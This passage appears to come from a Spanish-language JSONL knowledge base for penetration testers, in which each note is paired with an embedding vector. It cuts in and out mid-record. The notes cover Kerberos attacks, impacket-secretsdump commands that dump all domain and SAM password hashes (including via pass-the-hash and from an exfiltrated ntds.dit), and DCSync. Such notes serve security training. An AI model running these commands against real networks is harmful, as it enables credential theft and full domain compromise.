-0.02369, 0.04006, -0.05045, 0.07596, -0.03303, -0.02023, -0.09688, -0.16729, -0.00021, -0.00912, -0.08326, 0.06255, 0.01156, 0.06731, 0.03142, -0.00915, 0.02529, -0.06016, -0.03341, -0.1021, -0.10541, -0.02039, -0.06248, 0.05675, -0.00895, -0.04425, -0.01838, 0.12465, 0.11843, -0.0451, 0.06406, -0.01519, -0.01514, 0.03113, 0.00125, 0.00207, -0.02127, 0.00579, 0.07725, -0.06579, -0.00054, 0.02904, 0.03296, 0.03574, -0.00818, -0.01302, 0.04584, 0.00492, 0.02196, -0.02129, 0.00146, -0.03273, -0.05503, -0.02406, -0.06532, 0.06516, 0.01885, -0.0073, 0.00091, 0.07125, -0.04831, 0.02588, -0.02521, -0.0822, 0.07968, -0.01249, 0.01698, -0.02548, 0.0576, -0.11017, 0.02605, -0.02354, 0.00029, 0.03956, 0.04091, 0.00863, 0.02934, 0.02723, 0.06699, 0.0502, -0.07838, 0.07591, 0.01821, 0.04904, -0.07143, -0.03998, 0.06228, -0.00682, 0.03581, -0.01128, 0.04145, 0.05901, -0.02933, 0.04187, -0.09563, 0.02667, 0.02521, 0.00474, 0.00406, 0.0868, 0.09148, -0.03517, -0.03919, -0.03731, -0.03578, 0.04944, -0.03892, -0.00896, -0.03584, -0.00896, 0.02957, 0.00642, -0.08856, -0.04306, -0.13198, 0.01647, -0.04698, -0.00018, -0.03699, -0.02248, 0.01467, -0.02302, -0.02702, 0.01649, -0.06282, 0.08638, -0.02221, 0.02657, 0.03246, -0.01029, -0.04939, -0.08796, -0.04678, -0.04218, -0.06372, -0.00152, -0.03912, -0.0747, 0.00235, -0.01221, -0.03386, 0.01518, -0.0245, 0.02862, 0.0912, -0.04164, 0.05529, 0.05635, -0.07963, 0.06736, -0.05803, -0.04152, 0.0219, -0.02087, -0.01327, 0.02741, 0.03486, -0.02275, 0.02437, 0.01467, 0.00621, -0.02765, -0.01984, 0.08109, -0.01101, 0.07435, 0.04178, -0.04648, 0.02221, 0.04836, -0.05373, 0.00216, 0.06208, 0.01695, -0.02065, -0.09622, -0.0472, 0.05764, 0.05489, -0.04401, 0.00719, -0.04137, -0.07112, -0.0406, 0.02073, 0.02326, -0.06196, 0.00957, -0.03306, 0.01301, -0.05967, 0.03263, -0.02246]} +{"tipo": "metodologia", "herramienta": "Kerberos", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/Kerberos.md", "texto": "## Por qué importa (los ataques)\n- Reutilizar un TGT/TGS válido = **pass-the-ticket**.\n- Pedir TGS de cuentas con SPN sin tenerlas = Kerberoasting.\n- Usuarios sin pre-auth = AS-REP Roasting.\n- Hash de **krbtgt** = forjar Golden Ticket (ser cualquiera, para siempre).\n\nRelacionado: Impacket · Mimikatz · OSCP MOC", "v": [-0.27533, -0.26852, -0.09149, 0.01508, 0.14638, -0.12809, -0.00405, 0.0595, -0.02751, 0.17989, -0.12514, 0.01203, 0.13715, 0.09733, 0.15199, -0.00396, -0.05867, 0.00423, 0.13544, 0.09772, 0.07497, 0.02198, -0.02255, -0.03445, 0.04144, 0.14397, 0.02859, -0.05706, -0.09776, 0.03221, -0.00252, -0.11464, -0.1352, -0.09762, -0.14568, -0.05204, -0.02674, 0.18367, 0.1226, 0.11695, 0.0772, 0.07756, -0.10821, 0.18478, 0.11274, -0.10528, 0.10568, 0.05036, -0.03344, -0.0482, 0.00578, 0.00699, -0.13929, 0.00189, -0.03585, 0.00115, 0.0211, -0.00838, -0.14037, 0.07524, -0.02909, -0.02849, -0.06433, -0.03932, 0.0068, -0.0922, -0.02031, -0.05518, -0.0512, 0.01372, -0.12501, 0.0903, -0.0001, -0.041, 0.09361, -0.00655, 0.10674, -0.02419, 0.07132, 0.05953, -0.0268, -0.09842, -0.04098, 0.05176, 0.0253, -0.05671, 0.05654, -0.05231, -0.0324, -0.00697, 0.02195, 0.03875, 0.02294, 0.003, 0.00332, -0.09846, -0.10274, -0.06067, -0.05164, -0.02419, -0.06436, 0.04871, -0.05066, 0.01422, 0.00291, 0.00624, 0.06253, -0.02495, 0.11262, -0.02113, 0.08276, 0.00828, -0.06922, -0.02096, -0.00377, 0.01285, -0.02759, -0.02839, 0.06317, 0.03798, -0.01095, -0.01293, 0.03383, -0.05113, 0.03537, 0.0013, -0.02606, 0.07506, 0.00337, -0.00217, -0.01303, 0.03769, -0.0702, 0.02197, -0.01051, -0.01741, 0.01521, -0.09432, -0.00419, 0.00869, -0.01149, 0.0151, -0.00989, 0.03354, 0.06933, 0.016, 0.00837, -0.02492, -0.02607, 0.03979, 0.06028, -0.00385, 0.00899, 0.02657, 0.06498, 0.01483, 0.01488, -0.0491, -0.03722, 0.03573, 0.00628, 0.00159, 0.04982, 0.03662, -0.01143, 0.00114, 0.01149, -0.02194, 0.02411, -0.03576, 0.04198, 0.00314, 0.00533, 0.01517, -0.00754, -0.10762, -0.00261, -0.05463, -0.04925, -0.10039, 0.04277, -0.06931, 0.03758, 0.00462, -0.03621, 0.01523, 0.06196, 0.00053, 0.07298, -0.02469, 0.04013, 0.00608, 0.00694, 0.01161, -0.04328, -0.02477, 0.01321, -0.0966, -0.03264, 0.01484, -0.02745, 0.01358, -0.01342, -0.02348, 0.06689, 0.01509, -0.00045, 0.03736, -0.02714, 0.00882, 0.0465, -0.04363, 0.07935, -0.0481, -0.05834, -0.00783, -0.00476, 0.0033, 0.0084, 0.02729, -0.00698, 0.0008, 0.04407, 0.03326, 0.01591, -0.01685, 0.00467, -0.04531, 0.0159, 0.00875, 0.0124, 0.01015, 0.02183, -0.03333, 0.01142, -0.00112, -0.04831, -0.00673, -0.0435, 0.00166, 0.01903, 0.00487, -0.00219, 0.00778, -0.00174, -0.0229, -0.04317, 0.00598, 0.0275, -0.04879, -0.0095, -0.01766, -0.05064, -0.06289, -0.01618, -0.01028]} +{"tipo": "metodologia", "herramienta": "secretsdump", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/secretsdump.md", "texto": "# secretsdump (NTDS.dit / SAM)\n\n> `impacket-secretsdump` vuelca **todos los hashes** del dominio (NTDS.dit) o de una máquina (SAM/SYSTEM), en remoto o desde ficheros. Parte de Impacket.", "v": [-0.07147, -0.29018, -0.09058, -0.12931, -0.00934, -0.11836, -0.16631, 0.01381, -0.08722, 0.24624, -0.1252, -0.03026, 0.02399, -0.18829, 0.0094, 0.10232, 0.05323, -0.10221, 0.02018, 0.04401, 0.00111, -0.04897, -0.09513, 0.03694, 0.0405, 0.00094, 0.03361, 0.05274, -0.17275, 0.0603, 0.09491, 0.01978, -0.01693, -0.04031, -0.03757, -0.17716, 0.00866, 0.02385, 0.08787, 0.12843, 0.05214, 0.12908, -0.09393, 0.08298, 0.05739, -0.09395, -0.01489, -0.06595, 0.13595, -0.18629, -0.1414, 0.01123, -0.10714, -0.12726, -0.00595, -0.08443, 0.11216, 0.05184, -0.03386, 0.08121, 0.00806, 0.012, 0.06531, -0.01667, 0.04155, -0.17342, 0.06635, -0.08387, 0.04908, 0.0488, -0.06698, -0.06637, 0.11025, -0.05137, 0.0055, -0.00957, -0.00921, -0.05743, 0.07233, 0.00783, -0.0289, -0.09824, -0.04812, -0.01107, -0.04242, -0.06741, 0.00885, 0.01308, -0.08327, -0.05619, 0.0931, 0.03526, 0.01695, 0.04263, 0.03961, 0.00322, 0.04117, -0.00704, -0.03023, -0.05491, 0.04068, 0.0281, -0.01968, 0.04828, -0.04435, 0.07705, 0.07675, 0.02931, 0.05911, -0.00706, 0.09904, 0.01437, 0.05362, 0.05831, 0.0198, -0.07807, 0.03559, 0.0875, -0.00042, -0.00358, -0.00801, 0.00614, 0.03164, 0.0122, 0.07473, -0.06152, -0.01711, 0.03018, -0.03796, -0.03516, -0.00272, -0.03168, -0.06117, 0.06269, 0.11632, 0.00537, -0.04815, -0.01653, -0.00969, -0.09013, 0.08397, -0.01306, -0.02769, 0.06603, -0.00206, -0.02638, 0.03759, -0.04167, 0.03192, 0.01177, 0.06262, -0.00607, -0.0122, 0.03155, 0.04794, 0.07279, -0.02781, -0.02546, -0.05411, 0.00609, -0.00907, 0.07879, 0.00711, 0.02734, 0.01576, -0.0153, 0.00334, -0.03398, -0.01638, -0.03146, -0.08263, -0.01573, -0.0279, 0.02694, -0.00723, -0.04066, 0.06974, -0.01384, -0.00437, -0.07566, -0.0232, -1e-05, 0.03807, 0.03208, 0.0143, 0.00539, -0.0036, -0.04692, -0.00115, -0.06184, 0.04667, 0.0365, -0.02865, 0.00195, 0.01309, 0.00351, -0.02046, -0.05377, 0.05545, 0.06458, -0.0175, -0.00242, 0.00307, -0.04291, -0.02467, 0.03713, -0.02227, 0.00551, -0.05671, 0.0123, 0.07676, -0.0172, 0.01971, -0.06993, -0.08612, -0.02483, -0.05912, 0.04305, -0.0142, -0.03788, -0.00144, 0.01752, 0.04187, -0.01361, 0.04389, 0.01546, 0.06224, 0.01856, 0.04527, 0.00139, -0.00095, 0.05767, -0.00694, -0.01794, 0.02864, -0.01981, -0.00023, 0.01052, -0.02314, -0.00642, -0.0051, 0.04061, 0.0414, -0.05943, 0.01365, -0.04403, -0.04149, 0.02481, 0.01021, -0.01518, -0.00917, -0.04585, 0.0083, -0.03794, -0.0047, 0.0115]} +{"tipo": "metodologia", "herramienta": "secretsdump", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/secretsdump.md", "texto": "## Remoto contra un DC\n```bash\nimpacket-secretsdump dominio/usuario:password@DC_IP\nimpacket-secretsdump -hashes :NTLMHASH dominio/admin@DC_IP # con Pass-the-Hash\n```\nSaca NTLM de **todos** los usuarios + el hash de **krbtgt** → Golden Ticket.", "v": [-0.09586, -0.20593, -0.02884, -0.14494, -0.08154, -0.21842, -0.05113, 0.10794, -0.11043, 0.24594, 0.01724, -0.08868, -0.04455, -0.15473, -0.11437, -0.00986, 0.06342, 0.0297, -0.0037, -0.08773, 0.02608, 0.05633, -0.11426, -0.02443, 0.07388, -0.05636, -0.0693, 0.12999, -0.16008, 0.05223, 0.0325, -0.15711, -0.14865, 0.01693, -0.07014, -0.09151, 0.00237, 0.08853, 0.12237, 0.21484, 0.08614, 0.06402, -0.15675, 0.1459, 0.02413, -0.04247, 0.02641, -0.08746, 0.03807, -0.24461, -0.0831, -0.02417, -0.16223, -0.03173, -0.00266, -0.00979, 0.01205, 0.04038, -0.06891, -0.01592, -0.03975, 0.02611, -0.00861, 0.03652, -0.00382, -0.06389, -0.05223, -0.0904, -0.07458, 0.03969, -0.02134, 0.01749, 0.05151, -0.01752, 0.0862, 0.01166, 0.05593, -0.05542, 0.06901, 0.07939, -0.01354, -0.00722, -0.03673, -0.05528, -0.10386, -0.06657, 0.07203, -0.15782, -0.00986, 0.0304, 0.11085, 0.0516, -0.01041, 0.01026, 0.05868, -0.06983, 0.02756, -0.03448, -0.03257, -0.06528, -0.00618, 0.12295, -0.01852, 0.08981, 0.05088, 0.027, 0.08683, 0.01921, 0.06726, 0.0023, 0.05297, 0.00299, -0.00531, -0.00174, 0.01553, 0.04587, -0.0326, -0.03698, 0.06219, -0.03661, -0.03729, -0.01216, 0.02882, 0.00232, 0.04712, 0.02138, -0.02393, 0.02404, -0.00469, -0.09566, -0.02653, -0.04569, 0.01802, 0.0736, 0.0443, 0.03093, -0.02575, 0.00653, -0.06193, -0.00024, 0.08111, -0.01674, -0.04123, 0.04494, 0.06069, -0.05795, 0.02426, -0.10002, -0.0131, 0.01397, 0.0599, 0.00584, -0.00886, 0.0198, -0.01562, 0.04993, -0.03212, -0.03237, -0.03693, 0.02385, -0.02615, 0.05004, -0.00042, 0.04344, 0.00611, 0.00131, 0.0123, -0.02085, -0.00087, -0.01992, 0.00908, -0.00745, -0.00532, 0.00403, -0.02151, -0.03525, 0.05465, -0.05273, 0.01004, -0.06067, 0.03038, -0.02292, 0.03403, 0.04526, -0.02865, 0.00801, 0.07834, -0.03695, -0.00394, -0.04198, 0.01613, 0.01662, -0.01915, 0.03117, 0.01206, -0.02844, -0.01809, -0.05252, 0.02627, -0.02284, 0.01432, 0.04184, -0.00982, 0.00429, -0.00899, -0.03238, 0.00365, -0.01219, -0.04289, -0.01288, 0.05154, -0.03528, 0.04976, -0.04918, -0.07117, -0.00425, -0.0109, 0.03366, -0.04341, -0.02597, -0.03671, 0.05606, -0.00628, -0.00566, 0.02825, -0.02374, 0.00876, -0.00065, 0.03565, 0.01251, -0.00403, 0.05685, -0.02807, -0.00801, 0.03934, -0.01804, -0.01074, 0.02607, -0.02538, -0.01105, -0.01979, 0.01344, 0.02886, -0.00646, -0.0064, -0.02033, -0.02819, 0.0449, 0.00472, 0.00967, -0.02003, -0.04202, -0.0327, -0.00056, -0.05589, -0.00243]} +{"tipo": "metodologia", "herramienta": "secretsdump", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/secretsdump.md", "texto": "# exfiltras ntds.dit + SYSTEM con Transferencia de ficheros, luego:\nimpacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL\n```", "v": [-0.01318, -0.17559, -0.16045, -0.11321, 0.18895, -0.01334, -0.16567, -0.02866, -0.03302, 0.19188, -0.07657, 0.09266, -0.00111, -0.1966, -0.04473, 0.08762, -0.05677, -0.1878, 0.06741, 0.08795, -0.1165, -0.0626, -0.04759, -0.02852, 0.1032, 0.0709, -0.03326, -0.06114, -0.12992, 0.12003, 0.10264, 0.01039, 0.02775, -0.00213, 0.01282, -0.08673, 0.06995, -0.01651, -0.02152, 0.00327, -0.00466, 0.11623, 0.0565, 0.05205, 0.10766, -0.08101, -0.09058, -0.09199, 0.10791, -0.14155, -0.06523, -0.04703, -0.16827, -0.21268, -0.01141, -0.12437, 0.08743, -0.00627, 0.00095, 0.13225, 0.06038, -0.00441, 0.05866, -0.01817, 0.07148, -0.10095, 0.14361, -0.09843, 0.00946, 0.09154, -0.07488, -0.00035, 0.1475, -0.02854, -0.02895, 0.01691, -0.02332, 0.0232, 0.00644, 0.05384, -0.03854, -0.0938, -0.02623, 0.00966, 0.03455, -0.05756, 0.03069, -0.00377, -0.05915, -0.07101, 0.03421, -0.07594, 0.01971, 0.07086, 0.09134, 0.02038, -0.00856, 0.04116, -0.03513, -0.01903, 0.01866, -0.01543, -0.04723, 0.09504, -0.07684, -0.03763, 0.04309, 0.04588, 0.14714, -0.04299, 0.02506, 0.0051, 0.09784, -0.01467, 0.03559, -0.05497, 0.07071, 0.07137, -0.03514, -0.02436, -0.02934, 0.00947, 0.03604, -0.02449, 0.04725, -0.05675, 0.04114, 0.02153, -0.03899, 0.03244, -0.02903, -0.01908, -0.01418, 0.03436, 0.03103, -0.04687, -0.04475, 0.02916, -0.0231, -0.01474, 0.02416, 0.00497, 0.05487, 0.06176, -0.03234, 0.06266, 0.07315, -0.02147, 0.02492, -0.04122, 0.03991, 0.0075, -0.05378, -0.01044, 0.04678, 0.03909, 0.01624, -0.07916, -0.10193, -0.03671, 0.00169, 0.02797, 0.03143, 0.01663, -0.01649, -0.03347, 0.02157, -0.0216, 0.01182, -0.0036, -0.03779, -0.00666, -0.01433, -0.06301, 0.05723, -0.01417, 0.02273, -0.04735, 0.05541, 0.00406, -0.03881, 0.07225, 0.05828, 0.02976, 0.01642, -0.01552, -0.05999, 0.00121, 0.00031, -0.01535, 0.04032, 0.03051, -0.03613, 0.02409, 0.00555, 0.01746, -0.01537, -0.09319, 0.02388, 0.04399, -0.04463, 0.04422, 0.03903, -0.05792, -0.03455, 0.05703, 0.01232, -0.03013, -0.01128, 0.02259, 0.08714, -0.01077, 0.02758, -0.04492, -0.08427, 0.01005, -0.07027, 0.05593, 0.01477, -0.02946, 0.01682, 0.0108, 0.05848, 0.02235, 0.00168, 0.02498, 0.02961, 0.00669, 0.0343, -0.01476, -0.04778, -0.0118, -0.00638, -0.01213, 0.02207, -0.01384, -0.04227, 0.01688, -0.01124, -0.01325, 0.0314, 0.04119, -0.00072, -0.03719, -0.02192, -0.01889, -0.02978, -0.00345, 0.07603, -0.01955, 0.02429, -0.03815, -0.00769, -0.04605, 0.03779, 0.0192]} +{"tipo": "metodologia", "herramienta": "secretsdump", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/secretsdump.md", "texto": "## SAM local de una máquina\n```bash\nimpacket-secretsdump -sam SAM -system SYSTEM LOCAL\n```", "v": [-0.09193, -0.07514, -0.08027, -0.19206, -0.12679, -0.26172, -0.12132, -0.0996, -0.03462, 0.14833, -0.15915, 0.03195, 0.04187, -0.10636, 0.06297, 0.16557, -0.04898, -0.07866, -0.03757, 0.07354, 0.08646, 0.06561, -0.03784, 0.05971, 0.10543, 0.06361, 0.03596, -0.04178, -0.15618, 0.03485, 0.09757, 0.08346, 0.044, -0.03489, -0.01965, -0.14859, 0.09306, -0.01625, -0.02002, 0.12153, 0.01413, -0.04685, -0.06268, 0.10837, 0.1305, -0.0286, -0.01739, -0.11699, 0.09654, -0.15728, -0.26278, 0.03777, -0.10157, -0.12227, 0.04591, -0.10006, 0.01372, 0.02306, -0.03214, 0.08702, 0.03131, -0.04365, 0.09355, 0.06809, 0.13338, 0.03742, 0.07215, -0.09767, 0.08945, 0.11622, -0.03065, -0.07125, 0.12813, -0.03403, -0.00375, 0.06112, 0.01092, -0.01805, 0.11444, -0.0105, -0.04553, -0.05517, 0.02076, 0.07149, 0.02857, -0.00978, 0.06314, 0.0069, 0.02016, -0.03294, 0.05111, -0.03679, 0.07799, 0.08524, 0.062, 0.00323, 0.01829, -0.00239, -0.04973, 0.04816, 0.00184, -0.10468, -0.01414, 0.05264, -0.00122, -0.02579, 0.02105, 0.08425, 0.08521, -0.01603, 0.07233, -0.01209, 0.09428, 0.0674, -0.00443, -0.09555, 0.03109, 0.14058, -0.05022, 0.05115, 0.05517, -0.01216, 0.04973, -0.03687, 0.02587, -0.06766, 0.02437, 0.03366, 0.00603, -0.00542, 0.05486, -0.01827, 0.04703, 0.05722, 0.07884, -0.05211, -0.00403, -0.03892, -0.05366, -0.02629, 0.04151, -0.01277, -0.025, 0.03334, -0.01491, -0.00147, 0.03816, -0.02315, 0.0059, 0.0076, 0.04618, 0.02166, 0.00601, 0.01154, 0.01524, 0.08201, 0.01999, -0.01837, -0.03407, -0.04718, 0.0288, 0.05134, -0.03562, 0.01855, -0.03285, -0.01963, -0.01153, 0.02937, 0.00356, -0.02634, -0.0636, 0.02445, -0.04101, 0.04023, -0.00806, -0.01939, 0.03814, -0.02556, 0.00203, -0.01638, -0.00157, 0.03812, 0.03285, 0.02686, 0.01667, 0.0042, -0.01365, -0.00914, 0.02631, -0.03362, 0.04957, -0.01197, -0.00581, 0.01546, -0.00788, 0.01636, -0.01184, -0.02699, 0.03626, 0.05091, -0.0464, 0.05575, -0.02094, 0.00186, -0.00787, 0.08105, -0.04451, -0.02666, -0.01211, 0.03617, 0.0142, 0.02343, -0.01881, -0.04393, -0.08295, -0.03273, -0.03553, 0.00472, 0.01276, -0.04405, 0.00047, -0.04118, 0.06937, 0.04618, -0.02451, 0.03009, 0.02846, 0.0015, 0.04937, -0.01498, 0.01409, 0.02515, -0.03986, -0.01004, 0.00475, -0.03568, -0.01462, 0.01983, -0.03428, -0.01868, 0.03614, 0.0631, 0.03062, -0.05005, -0.00514, -0.01815, -0.02841, -0.05903, 0.01684, -0.00263, -0.01396, -0.02525, 0.00892, -0.02745, 0.02416, 0.02752]} +{"tipo": "metodologia", "herramienta": "secretsdump", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/secretsdump.md", "texto": "## Cómo se obtienen permisos\n- Ser admin del DC, o derechos de replicación → DCSync.\n\nRelacionado: Mimikatz · Active Directory · OSCP MOC", "v": [-0.16086, -0.00424, 0.01047, -0.17278, 0.03879, -0.17055, -0.16272, 0.1073, -0.132, 0.14294, 0.08751, -0.17218, -0.03611, -0.28766, 0.09146, -0.10495, 0.17754, 0.05248, -0.07991, -0.14883, 0.11038, -0.08304, 0.01104, 0.0271, 0.18236, 0.05188, 0.03967, -0.0155, -0.04886, -0.05035, 0.14008, -0.05364, 0.05359, 0.08029, 0.06161, -0.01618, -0.0663, -0.03545, 0.14687, 0.00758, -0.10176, 0.01214, -0.21985, 0.12061, 0.01448, -0.0193, 0.09833, -0.06891, -0.01983, -0.12396, -0.10046, -0.04545, -0.16016, 0.02679, -0.02535, 0.05542, -0.04858, 0.05634, 0.01658, -0.01442, -0.02542, 0.01143, -0.02913, -0.0463, -0.02762, 0.04883, -0.06046, -0.0725, -0.13229, 0.10576, -0.00615, 0.08761, 0.06375, -0.02724, 0.09409, -0.06591, 0.04757, -0.17003, 0.09756, 0.02923, -0.00582, 0.06839, -0.00138, 0.0143, 0.00366, -0.00475, 0.11143, -0.02897, -0.0566, -0.00255, 0.13329, 0.07857, -0.07013, 0.01102, 0.02404, -0.09223, -0.05468, 0.01024, 0.01058, 0.01627, -0.04259, 0.04286, -0.00891, 0.04693, -0.02746, 0.03195, 0.06339, -0.03842, -0.00726, 0.02212, 0.02156, 0.04545, 0.0025, 0.0036, -0.02436, 0.04434, -0.05622, -0.0819, 0.0039, 0.02161, -0.05825, -0.00809, 0.03405, -0.04812, 0.00436, 0.05171, 0.00787, 0.08849, -0.02903, -0.01367, -0.0009, -0.0656, 0.04949, -0.06051, 0.00754, -0.04278, 0.01485, 0.05624, -0.03109, -0.06959, -0.01468, -0.03719, 0.06068, 0.04582, 0.0479, 0.02235, -0.00021, 0.00995, -0.01376, -0.05456, 0.02803, 0.02259, 0.04389, -0.05169, 0.01156, 0.0563, -0.05625, -0.04473, -0.02686, 0.01136, 0.016, 0.04321, 0.01218, -0.00041, 0.0356, 0.00179, -0.00181, -0.04225, -0.00327, -0.01642, -0.03002, 0.05317, -0.00866, -0.04396, -0.04053, -0.02541, 0.05718, -0.00333, 0.03694, -0.02596, 0.03099, -0.00025, -0.00974, 0.01397, 0.01087, -0.02308, 0.02964, -0.00094, 0.0047, -0.00064, 0.00583, -0.01097, 0.04794, -0.05192, 0.03067, -0.04409, 0.00257, -0.00638, -0.03841, -0.00623, 0.00642, -0.02565, 0.00152, 0.00059, 0.07275, -0.04188, 0.01772, 0.0789, -0.01065, -0.02796, 0.00239, -0.01352, 0.09235, 0.02205, -0.01248, 0.00383, -0.01538, 0.00905, 0.00315, 0.02336, 0.00933, 0.00642, 0.00041, 0.04434, 0.05252, -0.04178, 0.03615, 0.00214, -0.00174, 0.0342, -0.00228, 0.03746, -0.00184, -0.0479, 0.03352, 0.03307, -0.03537, 0.00364, -0.00583, -0.00662, 0.05102, 0.00233, 0.03544, 0.02358, -0.0204, -0.00174, 0.02817, -0.01883, 0.00782, -0.03422, 0.03668, -0.01582, 0.01296, -0.00318, -0.03234, -0.01357]} +{"tipo": "metodologia", "herramienta": "DCSync", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/DCSync.md", "texto": "# DCSync\n\n> Con permisos de **replicación de directorio** (DS-Replication-Get-Changes), pides al DC que te \"replique\" los hashes **como si fueras otro DC**. No necesitas pisar el DC.", "v": [-0.03374, -0.02409, -0.11765, -0.0637, 0.05728, -0.13776, -0.02599, 0.09326, -0.03986, 0.17957, 0.06712, -0.15479, -0.19417, -0.34717, -0.02867, -0.20939, 0.04671, 0.11966, -0.07552, -0.12313, 0.08297, -0.13248, -0.03882, -0.0441, 0.13232, 0.01918, -0.04072, -0.0031, -0.18924, 0.02549, 0.11696, -0.06667, -0.02113, -0.05138, -0.01518, -0.01775, -0.09243, -0.00645, 0.15279, -0.00223, -0.02227, 0.00197, -0.24521, 0.09797, -0.08006, -0.07605, 0.0598, -0.02284, -0.02751, -0.12879, -0.07644, 0.05147, -0.1538, 0.06901, -0.01579, -0.03341, 0.05073, 0.10193, -0.00203, -0.07672, -0.03104, 0.05729, -0.02839, -0.03789, 0.01938, 0.03201, -0.04276, -0.10751, -0.07271, 0.01725, -0.12204, 0.0527, 0.05993, -0.05742, 0.09861, -0.0348, 0.02779, -0.13358, 0.01257, 0.04647, 0.01193, 0.02218, -0.04228, -0.03155, 0.03979, 0.01858, 0.0625, -0.08431, -0.01461, 0.02098, 0.0864, 0.02458, -0.06859, 0.01695, 0.04856, -0.0973, -0.02062, 0.04005, -0.02065, 0.00486, 0.0137, 0.03478, 0.00354, 0.04731, -0.08377, 0.0351, 0.0876, -0.0576, 0.02117, 0.027, 0.05761, 0.00485, 0.03903, 0.00562, -0.01984, 0.03286, -0.00223, -0.05758, 0.03388, 0.02844, -0.01411, -0.03224, -0.01738, -0.00562, 0.00885, 0.04888, -0.00644, 0.01429, 0.01612, -0.02361, -0.00088, -0.08017, 0.02287, -0.02948, -0.00103, 0.03298, 0.02411, 0.04673, -0.05188, -0.0511, 0.03485, 0.05536, 0.06779, 0.02203, 0.07673, 0.00681, 0.06382, -0.01674, -0.04961, 0.00363, 0.07604, 0.03302, 0.04642, 0.0075, -0.06486, -0.00633, 0.03519, -0.0227, 0.0004, 0.082, -0.02868, 0.00788, 0.03789, 0.00191, 0.01716, -0.04389, -0.00897, -0.07122, 0.02356, 0.04367, -0.0532, -0.03314, -0.0362, -0.05828, -0.0523, -0.00924, 0.03353, -0.03867, 0.03498, 0.01023, -0.00472, 0.03152, 0.01653, -0.0, -0.01981, -0.03241, 0.04413, -0.02749, 0.03293, -0.0215, 0.01533, 0.04941, 0.06301, -0.04665, 0.02793, -0.00665, -0.00242, -0.03405, 0.00764, -0.0189, -0.03885, 0.00078, -0.02471, -0.02288, 0.08998, -0.00716, 0.0043, 0.09088, -0.06773, -0.01531, 0.05872, -0.0227, 0.05633, 0.01365, -0.02946, -0.0377, 0.00761, 0.01722, -0.00529, 0.07043, -0.00274, 0.02997, 0.0087, -0.005, 0.00282, -0.03356, 0.04293, 0.02097, 0.04222, 0.05439, 0.02806, 0.08026, -0.01365, -0.0704, 0.03287, 0.02403, -0.00698, 0.01485, -0.01967, -0.00149, 0.03782, 0.00955, -0.0393, 0.00236, -0.0005, 0.01202, 0.01395, 0.02625, 0.02964, -0.03341, -0.00593, -0.02999, -0.01902, -0.01042, -0.01696, -0.04449]} +{"tipo": "metodologia", "herramienta": "DCSync", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/DCSync.md", "texto": "## Cómo se llega\n- Un usuario con esos derechos (te lo dice BloodHound: arista `DCSync` / `GetChangesAll`).\n- O un ACL abuses que te conceda esos derechos.", "v": [-0.2699, -0.02518, 0.07831, -0.04905, 0.05455, -0.02791, -0.13169, 0.04137, -0.06772, 0.12916, -0.08436, -0.22368, -0.21259, -0.07068, 0.02673, -0.22024, 0.12152, 0.11166, -0.02792, -0.07852, 0.02429, -0.13681, -0.03255, -0.0437, 0.03576, -0.04039, 0.03352, 0.02606, 0.02465, 0.01015, 0.0214, -0.09115, 0.09519, 0.03805, 0.0465, -0.05221, -0.10395, 0.06132, 0.10833, 0.12858, 0.00095, 0.03468, -0.07845, -0.01506, 0.04635, -0.08987, 0.03332, 0.0808, -0.04094, -0.11907, 0.01195, 0.05299, -0.22259, -0.0453, 0.02949, 0.01988, 0.00705, 0.05496, -0.01333, -0.02734, 0.0267, 0.00115, 0.05785, 0.0665, 0.01284, 0.06567, -0.0445, -0.01883, -0.09516, 0.10972, -0.02409, 0.07684, -0.04978, -0.11077, 0.0993, -0.12615, -0.00159, -0.12268, 0.14452, 0.00377, -0.06446, 0.04444, 0.00065, -0.05022, -0.02026, 0.0539, 0.15564, -0.05153, -0.0224, -0.08833, 0.14352, 0.01757, -0.04691, 0.0261, 0.00302, -0.11064, -0.00892, -0.04011, 0.04922, -0.00774, 0.01994, 0.02871, -0.02715, 0.08304, -0.00932, -0.01811, 0.02468, -0.08435, 0.00589, -0.02487, 0.04446, 0.12943, 0.0026, 0.05317, 0.0157, 0.07167, -0.04901, -0.03722, 0.04257, -0.01221, -0.01051, -0.10544, 0.00501, -0.03363, 0.02918, 0.02395, 0.0491, 0.09546, -0.11286, 0.01679, -0.07839, -0.0603, 0.02473, -0.03609, 0.02869, -0.05002, -0.05711, 0.03043, 0.05624, 0.0261, 0.06654, 0.06368, 0.02763, 0.06828, -0.02225, 0.00317, 0.02821, -0.02794, -0.03149, -0.04257, 0.06245, 0.00848, 0.06061, -0.05773, 0.02763, -0.03113, -0.0895, -0.0804, -0.04944, -0.00174, -0.00838, 0.0238, -0.01319, 0.00875, -0.00656, -0.01107, 0.03247, -0.04872, -0.02524, -0.03764, 0.0202, -0.00643, 0.03992, 0.04061, -0.02606, -0.06084, 0.02424, -0.03542, 0.03804, -0.00792, 0.00817, -0.00618, -0.0681, 0.04882, 0.00681, -0.02544, -0.05248, 0.01699, -0.00014, 0.00605, 0.01732, 0.01046, 0.08305, -0.06133, -0.02014, -0.00768, -0.03515, 0.0373, -0.03625, -0.06576, -0.02928, -0.04759, 0.0079, 0.05187, 0.01637, -0.01381, 0.02016, 0.03551, -0.04555, -0.01983, 0.00547, -0.04261, 0.00798, -0.0087, -0.02774, 0.01754, -0.01785, -0.00931, -0.05374, -0.06415, 0.01612, -0.00403, -0.0123, 0.05269, 0.00041, 0.04266, 0.0493, -0.05323, 0.01852, -0.0374, 0.03733, 0.07537, -0.06891, -0.04694, -0.02589, 0.07426, -0.02432, 0.01518, -0.01336, -0.0366, 0.0206, 0.04557, 0.01195, -0.00126, 0.03668, -0.04722, -0.05414, -0.02571, 0.03642, -0.01745, 0.01948, -0.02456, 0.03289, -0.05251, 0.00348, -0.00487]} +{"tipo": "metodologia", "herramienta": "DCSync", "perfil": "PENTESTERS", "tema": "active directory", "fichero": "conocimiento/05 - Active Directory/DCSync.md", "texto": "## Ataque\n```bash\nimpacket-secretsdump 